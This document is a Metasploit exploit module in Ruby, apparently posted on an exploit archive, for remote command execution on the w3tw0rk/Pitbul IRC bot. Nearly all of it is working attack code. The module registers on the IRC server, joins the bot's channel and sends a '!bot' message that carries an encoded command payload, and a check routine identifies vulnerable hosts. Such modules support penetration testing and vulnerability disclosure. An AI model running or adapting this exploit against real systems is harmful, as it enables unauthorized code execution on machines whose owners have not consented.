w3tw0rk / Pitbul IRC Bot Remote Code Execution
Posted on 23 September 2015
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution', 'Description' => %q{ This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot. }, 'Author' => [ 'Jay Turla' ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '120384' ], [ 'EDB', '36652' ] ], 'Platform' => %w{ unix win }, 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Targets' => [ [ 'w3tw0rk', { } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 04 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(6667), OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']) ], self.class) end def check connect res = register(sock) if res =~ /463/ || res =~ /464/ vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end res = join(sock) if !res =~ /353/ && !res =~ /366/ vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") return Exploit::CheckCode::Unknown end quit(sock) disconnect if res =~ /auth/ && res =~ /logged in/ Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def send_msg(sock, data) sock.put(data) data = "" begin read_data = sock.get_once(-1, 1) while !read_data.nil? data << read_data read_data = sock.get_once(-1, 1) end rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e elog("#{e.class} #{e.message} #{e.backtrace * " "}") end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty? msg << "PASS #{datastore['IRC_PASSWORD']} " end if datastore['NICK'].length > 9 nick = rand_text_alpha(9) print_error("The nick is longer than 9 characters, using #{nick}") else nick = datastore['NICK'] end msg << "NICK #{nick} " msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick} " send_msg(sock,msg) end def join(sock) join_msg = "JOIN #{datastore['CHANNEL']} " send_msg(sock, join_msg) end def w3tw0rk_command(sock) encoded = payload.encoded command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded} " send_msg(sock, command_msg) end def quit(sock) quit_msg = "QUIT :bye bye " sock.put(quit_msg) end def exploit connect print_status("#{rhost}:#{rport} - Registering with the IRC Server...") res = register(sock) if res =~ /463/ || res =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return end print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...") res = join(sock) if !res =~ /353/ && !res =~ /366/ print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") return end print_status("#{rhost}:#{rport} - Exploiting the IRC bot...") w3tw0rk_command(sock) quit(sock) disconnect end end
